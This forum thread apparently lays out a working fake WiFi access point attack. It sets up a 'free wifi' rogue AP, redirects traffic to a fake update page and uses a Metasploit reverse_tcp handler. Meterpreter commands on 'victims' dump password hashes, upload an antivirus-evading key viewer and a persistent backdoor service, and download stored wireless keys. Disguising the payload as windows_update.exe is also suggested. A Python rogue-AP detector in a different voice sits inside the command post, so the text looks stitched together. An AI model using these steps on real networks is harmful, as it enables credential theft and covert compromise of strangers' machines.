
Thread: Fake AP WEP/WPA key grab - Video and commands

  1. #1 Member (joined Feb 2010, 204 posts)

    Fake AP WEP/WPA key grab - Video and commands

    I have decided to create a new thread - a follow up on the bruteforce attack thread. Hopefully this will give everyone a head start and develop from here.

    PS: I'm still a Linux newb.

    Here is the video. Apologies if it's too slow; you guys might want to fast forward a few bits.
    http://blip.tv/file/1486885


    Here are the commands
    http://pastebin.com/f556dd85c


    I have only struggled with the meterpreter service installer, it installs fine but I can't run the test.rb script. If anyone else has success let me know. http://www.phreedom.org/software/metsvc/


    Jobs I think need doing

    (1) get the test.rb script working
    (2) Meterpreter script to automate the uploading of wireless key viewer and meterpreter server -- on non transparency mode we have little time so it is essential that it's automated
    (3) Scripts to start/stop and redirect victims


    Wireless key viewer was modified with a hex editor to bypass most av detection.
    If anyone wants it and any other files I used then I will upload them somewhere.

  2. #2 Member (joined Feb 2010, 204 posts)

    Commands for fake ap

    dhclient wlan0 //// Connect to the internet, can be eth0



    *****Setup metasploit listener********* ///// you need to create the meterpreter reverse_tcp connection --- information is available in many places http://www.irongeek.com/i.php?page=v...oad-executable
    cd /
    cd pentest
    cd exploits
    cd framework3
    ./msfconsole
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 10.0.0.1
    set LPORT 55555
    show options
    exploit




    modprobe tun
    airbase-ng -P -C 30 -e "free wifi" wlan1 -v ////// can use various commands here

    *************************
    Transparent Airbase
    *************************
    su
    ***************
    ifconfig lo up
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 ////router address
    iptables -P FORWARD ACCEPT
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE ///////// wlan0 = route to the internet
    /etc/init.d/dhcp3-server restart // backtrack users use dhcpd
    /etc/init.d/lighttpd stop
    lighttpd -D -f '/home/hm/Desktop/http/http' //webserver with fake update page


    ************************************************** ********************
    direct any request to apache
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1 //redirector
    ************************************************** ********************
    allow traffic again
    ifconfig lo up
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    iptables -P FORWARD ACCEPT
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    ************************************************************************

    NON Transparent Airbase
    su
    ***************
    modprobe tun
    airbase-ng -P -C 30 -e "free wifi" wlan1 -v

    su
    ***************
    ifconfig at0 up
    ifconfig lo up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
    iptables -P FORWARD ACCEPT
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
    /etc/init.d/dhcp3-server restart
    /etc/init.d/lighttpd stop
    lighttpd -D -f '/home/hm/Desktop/http/http'

    cd / /// dnspoison available at http://dnspentest.sourceforge.net/
    cd home
    cd hm
    cd Desktop
    cd dnspoison
    java ServerKernelMain 10.0.0.1 10.0.0.1

    ************************************************************************


    **** Check for victims ********
    arp -n -v -i at0





    sessions -l
    sessions -i
    sysinfo
    getuid
    use priv
    hashdump


    ***download keys*****
    mkdir c:\\windows\\wkviewer4
    cd \
    cd windows
    cd wkviewer4
    upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4 ///wireless key viewer
    upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4 /// executes bat script... check below
    upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4 //meterpreter server
    upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4
    upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4 //meterpreter server
    execute -H -f wkv.bat
    cat wkv.txt
    download wkv.txt /home/hm/Desktop/http/wkv.txt
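    The two behaviours this post relies on, an AP that answers probe requests for every SSID (airbase-ng -P) and a known SSID suddenly offered without encryption, are exactly what a wireless IDS looks for. The following is an added detection example, not code from the thread or from aircrack-ng; the frame records and the authorised-AP table are constructed, and the record format is an assumption rather than any tool's real output.

```python
"""Rogue-AP heuristics over constructed 802.11 management-frame records.
Added example; the data below is made up and not from the original thread."""
from collections import defaultdict

# Constructed inventory of legitimate APs: SSID -> allowed BSSIDs, must be encrypted?
AUTHORISED = {"corp-wifi": {"bssids": {"00:11:22:33:44:55"}, "privacy": True}}

# Constructed observations: (bssid, frame type, ssid, privacy bit set in capabilities)
FRAMES = [
    ("00:11:22:33:44:55", "beacon", "corp-wifi", True),
    ("aa:bb:cc:dd:ee:01", "beacon", "free wifi", False),
    ("aa:bb:cc:dd:ee:01", "probe_resp", "corp-wifi", False),
    ("aa:bb:cc:dd:ee:01", "probe_resp", "home-net", False),
    ("aa:bb:cc:dd:ee:01", "probe_resp", "airport", False),
    ("aa:bb:cc:dd:ee:01", "probe_resp", "cafe", False),
]


def find_rogue_aps(frames, authorised, probe_all_threshold=3):
    """Return sorted (bssid, reason) findings for suspicious access points.

    Three heuristics:
      1. a BSSID advertising an authorised SSID it is not registered for (evil twin);
      2. an SSID that must be encrypted seen with the privacy bit clear (downgrade);
      3. one BSSID answering probe requests for many unrelated SSIDs (probe-all AP).
    """
    findings = set()
    probe_ssids = defaultdict(set)
    for bssid, frame, ssid, privacy in frames:
        if frame == "probe_resp":
            probe_ssids[bssid].add(ssid)
        if ssid in authorised:
            if bssid not in authorised[ssid]["bssids"]:
                findings.add((bssid, f"unauthorised BSSID advertising {ssid!r}"))
            if authorised[ssid]["privacy"] and not privacy:
                findings.add((bssid, f"{ssid!r} offered without encryption"))
    for bssid, ssids in probe_ssids.items():
        if len(ssids) >= probe_all_threshold:
            findings.add((bssid, f"answers probes for {len(ssids)} SSIDs"))
    return sorted(findings)


if __name__ == "__main__":
    for bssid, reason in find_rogue_aps(FRAMES, AUTHORISED):
        print(f"ALERT {bssid}: {reason}")
```

    In practice the frame records would come from a monitor-mode capture; the threshold for the probe-all rule should be tuned so that legitimate multi-SSID controllers are not flagged.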

  3. #3 Member (joined Sep 2008, 146 posts)

    Just got done watching it, about to try it out. Great job man! This is really cool.

    EDIT: Wondering if you could post your dhcpd.conf file, or is it very different in Ubuntu?
    Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."

    Neo: "What if I take both?"

    Morpheus: "Don't do that! You end up like Nick Nolte!"

  4. #4 Member (joined Feb 2010, 204 posts)

    Here it is.

    BackTrack users run dhcpd -d -f -cf /etc/dhcpd.conf at0 instead of starting the dhcp server.

    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 10.0.0.0 netmask 255.255.255.0 {
        option routers 10.0.0.1;
        option subnet-mask 255.255.255.0;

        option domain-name "example.com";
        option domain-name-servers 10.0.0.1;

        range 10.0.0.20 10.0.0.50;
    }

  5. #5 Member (joined Sep 2008, 306 posts)

    The whole Fake AP (transparent) story is very interesting, and I'll as well do some setups next week and then add it to my diploma thesis.

    But: sorry that I have to ask such a (noob) question:

    The victims that are probing the ESSIDs, in my knowledge they have stored the kind of encryption which belongs to the AP.
    And if I'm right, the fake APs use no encryption? (because otherwise the clients can't connect)

    So won't there be an error message or a hint that tells the victim that's not their AP?

    Again sorry for that question, but it's been swirling in my head for a few days.
    Be sensitive in choosing where you ask your question. You are likely to be ignored, or written off as a loser, if you:

    * post your question to a forum where it's off topic
    * post a very elementary question to a forum where advanced technical questions are expected, or vice-versa
    * cross-post to too many different newsgroups
    * post a personal e-mail to somebody who is neither an acquaintance of yours nor personally responsible for solving your problem

  6. #6 Senior Member (joined Apr 2008, 2,008 posts)

    Very interesting, will have to try this one out myself. Thank you for the informational video and posting the commands in pastebin as well.
    -Monkeys are like nature's humans.

  7. #7 Member (joined Feb 2010, 204 posts)

    Quote (originally posted by terminal86):
    The whole Fake AP (transparent) story is very interesting, and I'll as well do some setups next week and then add it to my diploma thesis.

    But: sorry that I have to ask such a (noob) question:

    The victims that are probing the ESSIDs, in my knowledge they have stored the kind of encryption which belongs to the AP.
    And if I'm right, the fake APs use no encryption? (because otherwise the clients can't connect)

    So won't there be an error message or a hint that tells the victim that's not their AP?

    Again sorry for that question, but it's been swirling in my head for a few days.

    As far as I know it shouldn't matter; I don't think it will alert you. Try it out.

  8. #8 Junior Member (joined Sep 2008, 32 posts)

    Could Ettercap be used (in bridging mode) to eliminate the steps/configuration required to get the IP forwarding working? Might have other benefits as well.


    -- Tom

  9. #9 Member (joined Feb 2010, 204 posts)

    Port 53 is our best bet.

    55555 was just for testing purposes; AVG didn't detect anything.

    The firewall did when it was on, and asked to allow traffic outside, in which case you would rename your exe as windows_update.exe or something similar.


    Ettercap -- I think we discussed it in the other thread. No idea if it will work; what other things do you think there is a need for?

    If using it for other than a key grabber we could have a DNS server running and redirect queries to fake pages, but that wasn't my aim.

    This is a good starting point for most people. I would like to see further developments and lots more automation.

  10. #10 Just burned his ISO (joined Dec 2007, 5 posts)

    Very good job.
    Thanks for sharing!

    THX BitLocker
